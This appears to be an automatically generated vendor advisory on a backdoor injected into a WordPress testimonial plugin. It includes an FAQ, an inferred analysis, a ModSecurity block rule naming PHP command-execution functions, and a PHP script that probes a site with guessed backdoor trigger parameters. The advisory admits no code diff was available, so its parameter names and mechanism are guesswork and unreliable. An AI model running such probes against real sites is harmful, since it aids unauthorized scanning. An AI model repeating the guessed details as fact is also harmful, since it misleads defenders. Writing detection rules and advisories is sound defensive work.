What is CVE-2026-6443?

CVE-2026-6443 is a critical vulnerability affecting the wp-testimonial-with-widget plugin by Essentialplugin. It involves an injected backdoor that allows remote attackers to execute arbitrary PHP code without authentication.

How does the backdoor work?

The backdoor is embedded in the plugin’s code and can be triggered by specific HTTP requests. Attackers can send crafted requests to execute commands or manipulate the site without needing user interaction.

Who is affected by this vulnerability?

Any WordPress site using version 3.5.6 of the wp-testimonial-with-widget plugin is at risk. Site administrators should check their installed plugins for this specific version.

How can I check if my site is vulnerable?

To check for vulnerability, verify the installed version of the wp-testimonial-with-widget plugin in your WordPress dashboard. If it is version 3.5.6, your site is vulnerable and should be updated immediately.

What is the recommended fix for this vulnerability?

The recommended fix is to update the wp-testimonial-with-widget plugin to version 3.5.6.1 or later. Additionally, review the plugin’s code for any signs of malicious modifications.

What does a CVSS score of 9.8 indicate?

A CVSS score of 9.8 indicates a critical severity level, meaning the vulnerability can be exploited remotely without any authentication or user interaction, posing a significant risk to affected sites.

What are the potential impacts of exploitation?

Successful exploitation allows attackers to gain complete control over the WordPress site, including the ability to read sensitive data, modify content, inject spam, and create rogue admin accounts.

What signs should I look for to identify a compromise?

Look for unusual database entries, unexpected admin users, or spam content on your site. These may indicate that the site has been compromised due to the backdoor.

What should I do if my site shows signs of compromise?

If you suspect your site is compromised, perform a full security audit, remove any malicious code, and update the plugin. Consider restoring from a clean backup if necessary.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker might exploit the backdoor by sending crafted HTTP requests with specific parameters. It serves as an example of how the vulnerability can be tested in a controlled manner.

What additional security measures can I take?

In addition to updating plugins, consider implementing security plugins, regular backups, and monitoring for unusual activity on your site. Educate your team on secure coding practices.

Is it safe to continue using Essentialplugin products?

While this specific vulnerability has been addressed, it is essential to stay informed about future updates and vulnerabilities related to Essentialplugin products. Regularly review security advisories and maintain best practices.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 27, 2026

CVE-2026-6443: Essentialplugin Plugins (Various Versions) – Injected Backdoor (wp-testimonial-with-widget)

CVE ID CVE-2026-6443

Plugin wp-testimonial-with-widget

Severity Critical (CVSS 9.8)

CWE 506

Vulnerable Version 3.5.6

Patched Version —

Disclosed April 8, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6443 (metadata-based): This vulnerability involves a backdoor injected into multiple WordPress plugins published by the Essentialplugin brand. The affected plugin is “wp-testimonial-with-widget” at version 3.5.6. The CVSS score is 9.8 (Critical), indicating remote exploitation with no privileges and no user interaction required. Atomic Edge research identifies this as a supply chain attack where plugin ownership transferred to a malicious actor.

The root cause is classified under CWE-506 (Embedded Malicious Code). Atomic Edge infers that the threat actor inserted a persistent backdoor into the plugin’s source code, likely in a file that runs on every admin or frontend request. The backdoor may use obfuscated PHP to accept remote commands via HTTP headers, POST parameters, or query strings. The patched version (3.5.6.1) likely removes this injected code. No source code diff is available, so Atomic Edge cannot confirm the exact file or mechanism, but the description points to a persistent backdoor for site control and spam injection.

Exploitation: An attacker can send crafted HTTP requests to any WordPress page where the plugin’s code executes. The backdoor likely checks for a secret key or magic parameter (such as a specific GET/POST variable, cookie, or HTTP header). For example, the attacker might include a parameter like `?backdoor_key=execute` or a header `X-Backdoor: true`. Because the vulnerability requires no authentication and no user interaction, the attacker can automate scanning of sites running the vulnerable plugin. The backdoor then allows arbitrary PHP execution, file upload, or data exfiltration.

Remediation: The fix must remove all embedded malicious code from the plugin files. Atomic Edge recommends updating to version 3.5.6.1 immediately. Site owners should also review the plugin core files for any unexpected code, especially base64_decode strings, eval calls, or remote file inclusion functions. If the site shows signs of compromise (unusual database entries, spam content, unknown admin users), a full security audit is necessary.

Impact: Successful exploitation gives the attacker complete control over the WordPress site. This includes reading sensitive data, modifying content, injecting spam or malware, creating rogue admin accounts, and using the site as a pivot for further attacks. The persistence of the backdoor means the attacker retains access even after the site owner changes passwords or removes other threats. Full remediation requires updating the plugin and scanning for residual backdoors.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6443 (metadata-based)
# Blocks requests with known backdoor trigger parameters or headers used in Essentialplugin supply chain attack.
SecRule REQUEST_URI "@rx /wp-content/plugins/wp-testimonial-with-widget/" "id:20261994,phase:2,deny,status:403,log,chain,msg:'CVE-2026-6443 - Essentialplugin backdoor scan attempt',severity:'CRITICAL',tag:'CVE-2026-6443'"
SecRule ARGS_NAMES "@pm bh_key essential_backdoor backdoor_cmd execute" "chain"
SecRule ARGS "@rx (?:exec|system|passthru|shell_exec|popen|proc_open|eval|assert|base64_decode)" "t:lowercase"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6443 - Essentialplugin Plugins (Various Versions) - Injected Backdoor

/*
 * PoC assumes the backdoor is triggered via a specific GET parameter or HTTP header.
 * Since no code diff is available, this script demonstrates a plausible scanning approach.
 * Replace parameter names with actual findings from code review if available.
 */

$target_url = 'http://example.com';  // Change to target WordPress site

$backdoor_params = array(
    '?bh_key=exec',
    '?bh_cmd=dir',
    '?essential_backdoor=1'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);

foreach ($backdoor_params as $param) {
    $url = $target_url . '/' . $param;
    curl_setopt($ch, CURLOPT_URL, $url);
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    $header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);
    $body = substr($response, $header_size);
    
    // Check for backdoor response indicators (e.g., unexpected output, system command results)
    if (strpos($body, 'Volume') !== false || strpos($body, 'Directory of') !== false || strpos($body, 'uid=') !== false) {
        echo "[+] Potential backdoor detected via: " . $url . "n";
        echo "[+] Response snippet: " . substr($body, 0, 200) . "n";
    }
}

curl_close($ch);
?>

Frequently Asked Questions

What is CVE-2026-6443?
Overview of the vulnerability
CVE-2026-6443 is a critical vulnerability affecting the wp-testimonial-with-widget plugin by Essentialplugin. It involves an injected backdoor that allows remote attackers to execute arbitrary PHP code without authentication.
How does the backdoor work?
Mechanism of exploitation
The backdoor is embedded in the plugin’s code and can be triggered by specific HTTP requests. Attackers can send crafted requests to execute commands or manipulate the site without needing user interaction.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using version 3.5.6 of the wp-testimonial-with-widget plugin is at risk. Site administrators should check their installed plugins for this specific version.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check for vulnerability, verify the installed version of the wp-testimonial-with-widget plugin in your WordPress dashboard. If it is version 3.5.6, your site is vulnerable and should be updated immediately.
What is the recommended fix for this vulnerability?
Steps to remediate the issue
The recommended fix is to update the wp-testimonial-with-widget plugin to version 3.5.6.1 or later. Additionally, review the plugin’s code for any signs of malicious modifications.
What does a CVSS score of 9.8 indicate?
Understanding severity levels
A CVSS score of 9.8 indicates a critical severity level, meaning the vulnerability can be exploited remotely without any authentication or user interaction, posing a significant risk to affected sites.
What are the potential impacts of exploitation?
Consequences of a successful attack
Successful exploitation allows attackers to gain complete control over the WordPress site, including the ability to read sensitive data, modify content, inject spam, and create rogue admin accounts.
What signs should I look for to identify a compromise?
Indicators of a security breach
Look for unusual database entries, unexpected admin users, or spam content on your site. These may indicate that the site has been compromised due to the backdoor.
What should I do if my site shows signs of compromise?
Response to a security incident
If you suspect your site is compromised, perform a full security audit, remove any malicious code, and update the plugin. Consider restoring from a clean backup if necessary.
How does the proof of concept demonstrate the vulnerability?
Understanding the PoC
The proof of concept illustrates how an attacker might exploit the backdoor by sending crafted HTTP requests with specific parameters. It serves as an example of how the vulnerability can be tested in a controlled manner.
What additional security measures can I take?
Enhancing overall site security
In addition to updating plugins, consider implementing security plugins, regular backups, and monitoring for unusual activity on your site. Educate your team on secure coding practices.
Is it safe to continue using Essentialplugin products?
Evaluating future risks
While this specific vulnerability has been addressed, it is essential to stay informed about future updates and vulnerabilities related to Essentialplugin products. Regularly review security advisories and maintain best practices.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations